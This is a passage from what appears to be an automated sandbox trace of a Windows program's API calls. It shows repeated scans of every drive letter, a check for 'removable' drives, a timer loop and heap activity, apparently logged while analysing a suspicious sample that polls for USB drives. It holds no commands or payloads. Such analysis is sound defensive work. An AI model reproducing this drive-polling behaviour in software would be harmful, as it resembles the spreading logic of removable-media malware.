GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.517] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.519] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.519] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.519] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.519] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.519] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.520] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.520] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.520] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.521] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.522] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.522] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.522] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.522] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.523] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.523] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.523] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.523] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.524] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.524] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.525] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.525] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.525] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.525] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.526] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0215.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.527] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.527] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.527] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.527] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.528] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.528] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0215.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.528] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.528] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.528] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0215.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0215.529] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0215.529] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.529] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.530] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.530] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.530] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0215.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.531] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0215.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.531] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.531] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.531] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.532] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.533] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.533] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.533] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.533] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.533] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.534] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.534] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.534] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.535] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.535] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.535] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.535] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.535] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.536] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.536] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.536] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.536] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.536] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.537] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.538] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.538] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.538] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.539] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.539] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.539] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.539] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.539] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.539] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.539] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0215.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.540] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.540] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.540] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.540] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.540] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.540] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.540] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325dc0 [0215.540] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.540] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.540] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.540] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325dc0 | out: hHeap=0x12c0000) returned 1 [0215.541] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.541] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.541] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0215.541] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.541] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0215.541] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.541] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.542] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.542] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.543] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.543] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.543] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.543] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.543] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0215.543] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.543] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.543] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.543] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.543] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.543] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.543] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.543] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.544] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.544] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.544] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.544] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.544] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.544] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0215.544] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.544] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.544] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.544] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.544] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.544] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.544] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.544] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.544] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.544] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.545] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.546] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.547] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.547] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.547] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.547] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.547] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.548] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.550] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.550] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.550] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.550] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.550] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.551] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.551] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.551] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.551] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.551] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.551] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.551] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.552] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.552] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.552] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.552] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.552] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.553] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.553] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.556] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.556] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0215.556] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.556] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.556] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.556] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.556] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.556] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.557] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.557] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.557] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.557] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.557] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.557] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0215.557] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0215.557] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0215.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.558] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0215.558] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0215.558] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0215.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.559] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.560] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.560] TranslateMessage 